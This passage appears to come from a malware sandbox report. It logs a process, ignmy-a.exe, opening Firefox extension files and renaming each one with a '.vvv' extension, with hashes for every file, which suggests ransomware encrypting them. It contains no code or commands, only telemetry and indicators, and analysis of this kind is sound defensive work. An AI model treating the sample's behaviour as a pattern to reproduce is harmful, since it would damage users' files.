  11754. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11755.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\mem
  11756.   ory.js
  11757. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11758.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\mem
  11759.   ory.js.vvv
  11760.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11761.  MD5:  ef073f99f00bdba3bd77283081594e51
  11762.  SHA1: 3cff2f538594dc0b88d7403a877dc522c5893859
  11763.     828     5182
  11764. File   
  11765. Open
  11766.    
  11767. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11768.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\obs
  11769.   erver-service.js
  11770.     828     7573
  11771. File   
  11772. Close
  11773.    
  11774. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11775.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\obs
  11776.   erver-service.js
  11777.  MD5:  0b9ea09ae5cd8c18561a7bc11d2fce89
  11778.  SHA1: 4cb11c2b556a486943c9ba099b05709ca86ad756
  11779.     828     7998
  11780. File   
  11781. Rename
  11782.    
  11783. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11784.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\obs
  11785.   erver-service.js
  11786. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11787.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\obs
  11788.   erver-service.js.vvv
  11789.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11790.  MD5:  0b9ea09ae5cd8c18561a7bc11d2fce89
  11791.  SHA1: 4cb11c2b556a486943c9ba099b05709ca86ad756
  11792.     828     7998
  11793. File   
  11794. Open
  11795.    
  11796. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11797.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pas
  11798.   swords\utils.js
  11799.     828     5249
  11800. File   
  11801. Close
  11802.    
  11803. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11804.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pas
  11805.   swords\utils.js
  11806.  MD5:  8a145447716dce4509fdb2709adade7a
  11807.  SHA1: 9628693ec4ad0a7fd07379e08bb39b1680595355
  11808.     828     5678
  11809. File   
  11810. Rename
  11811.    
  11812. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11813.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pas
  11814.   swords\utils.js
  11815. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11816.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pas
  11817.   swords\utils.js.vvv
  11818.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11819.  MD5:  8a145447716dce4509fdb2709adade7a
  11820.  SHA1: 9628693ec4ad0a7fd07379e08bb39b1680595355
  11821.     828     5678
  11822. File   
  11823. Open
  11824.    
  11825. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11826.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pla
  11827.   in-text-console.js
  11828.     828     3668
  11829. File   
  11830. Close
  11831.    
  11832. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11833.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pla
  11834.   in-text-console.js
  11835.  MD5:  c1b92aaee02d1fc15e2296f898e398d0
  11836.  SHA1: 54d26186a338077ed70b51d3abcddd4b451c733a
  11837.     828     4094
  11838. File   
  11839. Rename
  11840.    
  11841. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11842.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pla
  11843.   in-text-console.js
  11844. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11845.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pla
  11846.   in-text-console.js.vvv
  11847.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11848.  MD5:  c1b92aaee02d1fc15e2296f898e398d0
  11849.  SHA1: 54d26186a338077ed70b51d3abcddd4b451c733a
  11850.     828     4094
  11851. File   
  11852. Open
  11853.    
  11854. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11855.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pre
  11856.   ferences-service.js
  11857.     828     5370
  11858. File   
  11859. Close
  11860.    
  11861. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11862.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pre
  11863.   ferences-service.js
  11864.  MD5:  fc65ca218550f056ec25a986aec9533e
  11865.  SHA1: 59b030abf093b3db39c72b4078be90b3a0bd4a06
  11866.     828     5790
  11867. File   
  11868. Rename
  11869.    
  11870. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11871.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pre
  11872.   ferences-service.js
  11873. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11874.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\pre
  11875.   ferences-service.js.vvv
  11876.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11877.  MD5:  fc65ca218550f056ec25a986aec9533e
  11878.  SHA1: 59b030abf093b3db39c72b4078be90b3a0bd4a06
  11879.     828     5790
  11880. File   
  11881. Open
  11882.    
  11883. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11884.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\run
  11885.   time.js
  11886.     828     2103
  11887. File   
  11888. Close
  11889.    
  11890. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11891.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\run
  11892.   time.js
  11893.  MD5:  c16c2b800aa0bb4e2923f301d5536c81
  11894.  SHA1: af9a336737ec4955b0098edfd5fe9e9fab1e180d
  11895.     828     2526
  11896. File   
  11897. Rename
  11898.    
  11899. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11900.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\run
  11901.   time.js
  11902. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11903.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\run
  11904.   time.js.vvv
  11905.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11906.  MD5:  c16c2b800aa0bb4e2923f301d5536c81
  11907.  SHA1: af9a336737ec4955b0098edfd5fe9e9fab1e180d
  11908.     828     2526
  11909. File   
  11910. Open
  11911.    
  11912. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11913.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sec
  11914.   urable-module.js
  11915.     828     31689
  11916. File   
  11917. Close
  11918.    
  11919. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11920.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sec
  11921.   urable-module.js
  11922.  MD5:  99aff06937c8bda8c0bd6f288111caf5
  11923.  SHA1: 139c5235a0da57cb97dac009ddef306b884af0ff
  11924.     828     32110
  11925. File   
  11926. Rename
  11927.    
  11928. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11929.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sec
  11930.   urable-module.js
  11931. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11932.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sec
  11933.   urable-module.js.vvv
  11934.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11935.  MD5:  99aff06937c8bda8c0bd6f288111caf5
  11936.  SHA1: 139c5235a0da57cb97dac009ddef306b884af0ff
  11937.     828     32110
  11938. File   
  11939. Open
  11940.    
  11941. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11942.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sel
  11943.   f-e10s-adapter.js
  11944.     828     3624
  11945. File   
  11946. Close
  11947.    
  11948. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11949.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sel
  11950.   f-e10s-adapter.js
  11951.  MD5:  427a5996ff4e8012e77466a3c646c117
  11952.  SHA1: 152cbea0b0826acfe0ed28479572a1233d7d2718
  11953.     828     4046
  11954. File   
  11955. Rename
  11956.    
  11957. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11958.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sel
  11959.   f-e10s-adapter.js
  11960. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11961.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sel
  11962.   f-e10s-adapter.js.vvv
  11963.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11964.  MD5:  427a5996ff4e8012e77466a3c646c117
  11965.  SHA1: 152cbea0b0826acfe0ed28479572a1233d7d2718
  11966.     828     4046
  11967. File   
  11968. Open
  11969.    
  11970. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11971.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sel
  11972.   f-maker.js
  11973.     828     1024
  11974. File   
  11975. Close
  11976.    
  11977. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11978.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sel
  11979.   f-maker.js
  11980.  MD5:  21bce943e698183ca687518ebfb0cc20
  11981.  SHA1: 8f909542c9d1ac5a079883553492e6aad3909743
  11982.     828     1454
  11983. File   
  11984. Rename
  11985.    
  11986. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11987.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sel
  11988.   f-maker.js
  11989. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11990.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\sel
  11991.   f-maker.js.vvv
  11992.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11993.  MD5:  21bce943e698183ca687518ebfb0cc20
  11994.  SHA1: 8f909542c9d1ac5a079883553492e6aad3909743
  11995.     828     1454
  11996. File   
  11997. Open
  11998.    
  11999. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12000.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shi
  12001.   ms.js
  12002.     828     2266
  12003. File   
  12004. Close
  12005.    
  12006. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12007.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shi
  12008.   ms.js
  12009.  MD5:  5d7826646f385c50b15f7b01faf9b6cd
  12010.  SHA1: a17d4e026c5841d3a880abd1953a6239f5b4492f
  12011.     828     2686
  12012. File   
  12013. Rename
  12014.    
  12015. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12016.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shi
  12017.   ms.js
  12018. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12019.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shi
  12020.   ms.js.vvv
  12021.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12022.  MD5:  5d7826646f385c50b15f7b01faf9b6cd
  12023.  SHA1: a17d4e026c5841d3a880abd1953a6239f5b4492f
  12024.     828     2686
  12025. File   
  12026. Open
  12027.    
  12028. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12029.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12030.   -browser.js
  12031.     828     25192
  12032. File   
  12033. Close
  12034.    
  12035. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12036.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12037.   -browser.js
  12038.  MD5:  bb85411c9da7fa1643e2378b7c08f0ed
  12039.  SHA1: 467ce18738e74473fed76b24d63a831bff3da5b4
  12040.     828     25614
  12041. File   
  12042. Rename
  12043.    
  12044. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12045.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12046.   -browser.js
  12047. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12048.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12049.   -browser.js.vvv
  12050.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12051.  MD5:  bb85411c9da7fa1643e2378b7c08f0ed
  12052.  SHA1: 467ce18738e74473fed76b24d63a831bff3da5b4
  12053.     828     25614
  12054. File   
  12055. Open
  12056.    
  12057. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12058.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12059.   s\events.js
  12060.     828     2112
  12061. File   
  12062. Close
  12063.    
  12064. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12065.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12066.   s\events.js
  12067.  MD5:  c28025d68e6b380e40c99f1ff7408d13
  12068.  SHA1: 2c6b16ff980efe66ef709b895737510be9c640c3
  12069.     828     2542
  12070. File   
  12071. Rename
  12072.    
  12073. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12074.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12075.   s\events.js
  12076. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12077.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12078.   s\events.js.vvv
  12079.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12080.  MD5:  c28025d68e6b380e40c99f1ff7408d13
  12081.  SHA1: 2c6b16ff980efe66ef709b895737510be9c640c3
  12082.     828     2542
  12083. File   
  12084. Open
  12085.    
  12086. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12087.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12088.   s\observer.js
  12089.     828     4982
  12090. File   
  12091. Close
  12092.    
  12093. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12094.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12095.   s\observer.js
  12096.  MD5:  ed353c571e84da4a698923d9288cbcec
  12097.  SHA1: 7a9da045435a4f43971b39e51ce933ecfcc2ae12
  12098.     828     5406
  12099. File   
  12100. Rename
  12101.    
  12102. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12103.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12104.   s\observer.js
  12105. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12106.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12107.   s\observer.js.vvv
  12108.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12109.  MD5:  ed353c571e84da4a698923d9288cbcec
  12110.  SHA1: 7a9da045435a4f43971b39e51ce933ecfcc2ae12
  12111.     828     5406
  12112. File   
  12113. Open
  12114.    
  12115. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12116.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12117.   s\tab.js
  12118.     828     9861
  12119. File   
  12120. Close
  12121.    
  12122. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12123.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12124.   s\tab.js
  12125.  MD5:  96c1bc7124a8e91c963ef0bd183d8c0c
  12126.  SHA1: a55fc3a3157965e7b3fb6bf1d45eb5c699d8d472
  12127.     828     10286
  12128. File   
  12129. Rename
  12130.    
  12131. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12132.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12133.   s\tab.js
  12134. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12135.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12136.   s\tab.js.vvv
  12137.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12138.  MD5:  96c1bc7124a8e91c963ef0bd183d8c0c
  12139.  SHA1: a55fc3a3157965e7b3fb6bf1d45eb5c699d8d472
  12140.     828     10286
  12141. File   
  12142. Open
  12143.    
  12144. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12145.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12146.   s\utils.js
  12147.     828     2841
  12148. File   
  12149. Close
  12150.    
  12151. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12152.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12153.   s\utils.js
  12154.  MD5:  bf9fc0ddc68331294c7ca4c9ad0e16bd
  12155.  SHA1: 91394ecfde46afeaa8590882fcce026b292ff407
  12156.     828     3262
  12157. File   
  12158. Rename
  12159.    
  12160. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12161.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12162.   s\utils.js
  12163. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12164.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab
  12165.   s\utils.js.vvv
  12166.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12167.  MD5:  bf9fc0ddc68331294c7ca4c9ad0e16bd
  12168.  SHA1: 91394ecfde46afeaa8590882fcce026b292ff407
  12169.     828     3262
  12170. File   
  12171. Open
  12172.    
  12173. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12174.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tes
  12175.   t\assert.js
  12176.     828     10574
  12177. File   
  12178. Close
  12179.    
  12180. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12181.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tes
  12182.   t\assert.js
  12183.  MD5:  8b776a660d4d38e57944faafa3321366
  12184.  SHA1: d95c57e2ea87827c2b23f7a7756bef0df0842fea
  12185.     828     10990
  12186. File   
  12187. Rename
  12188.    
  12189. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12190.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tes
  12191.   t\assert.js
  12192. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12193.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tes
  12194.   t\assert.js.vvv
  12195.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12196.  MD5:  8b776a660d4d38e57944faafa3321366
  12197.  SHA1: d95c57e2ea87827c2b23f7a7756bef0df0842fea
  12198.     828     10990
  12199. File   
  12200. Open
  12201.    
  12202. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12203.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tes
  12204.   t.js
  12205.     828     5146
  12206. File   
  12207. Close
  12208.    
  12209. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12210.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tes
  12211.   t.js
  12212.  MD5:  de7393baf5bd2cff23eaad61949bb07c
  12213.  SHA1: 7a3b5f4b704e42011249c7145311a5ea632195e6
  12214.     828     5566
  12215. File   
  12216. Rename
  12217.    
  12218. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12219.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tes
  12220.   t.js
  12221. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12222.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tes
  12223.   t.js.vvv
  12224.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12225.  MD5:  de7393baf5bd2cff23eaad61949bb07c
  12226.  SHA1: 7a3b5f4b704e42011249c7145311a5ea632195e6
  12227.     828     5566
  12228. File   
  12229. Open
  12230.    
  12231. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12232.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tex
  12233.   t-streams.js
  12234.     828     9490
  12235. File   
  12236. Close
  12237.    
  12238. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12239.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tex
  12240.   t-streams.js
  12241.  MD5:  a54e415418c6b1538fa5d8b06bc91287
  12242.  SHA1: 08dc8690c89e872d42a061ad6dfe443958b7b740
  12243.     828     9918
  12244. File   
  12245. Rename
  12246.    
  12247. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12248.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tex
  12249.   t-streams.js
  12250. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12251.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tex
  12252.   t-streams.js.vvv
  12253.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12254.  MD5:  a54e415418c6b1538fa5d8b06bc91287
  12255.  SHA1: 08dc8690c89e872d42a061ad6dfe443958b7b740
  12256.     828     9918
  12257. File   
  12258. Open
  12259.    
  12260. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12261.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tim
